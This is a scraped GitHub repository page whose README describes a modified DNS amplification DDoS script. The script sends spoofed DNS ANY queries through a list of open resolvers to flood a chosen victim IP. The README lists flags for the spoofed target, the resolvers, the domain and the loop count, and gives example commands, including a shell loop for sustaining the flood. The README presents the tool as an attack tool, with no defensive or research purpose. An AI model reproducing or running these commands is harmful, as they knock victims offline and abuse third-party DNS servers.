Skip to content

DenFox93/DNS-Amplification-DDOS-attack

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 

Repository files navigation

DNS amplification DDOS attack

This is an edited version of the original script of noptrix of nullsecurity.net. Now the script will send DNS ANY query instead of DNS A query.

DNS ANY query request more data and because of that increase the amplification of the attack

usage:

dnsdrdosV2 -f [options] | [misc]

target:

-f - list of dns servers (only one ip-address per line!) -s - ip-address to spoof (default: 127.0.0.1) -d - which domain should be requested? (default: "google.com.") -l - how many loops through list? (default: 10000)

misc:

-V - show version -H - show help and usage

example:

./dnsdrdosV2 -f nameserver.lst -s 192.168.2.211 -d google.com. -l 10000

or better:

$ for i in seq 1 1000; do ./dnsdrdosV2 -f nameserver.lst -s 192.168.2.211 -d $i -l 10000; done

This is better, because we ask dynamically for any domain names. Even if the domainname is not given, 'we' still would recieve DNS answers.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages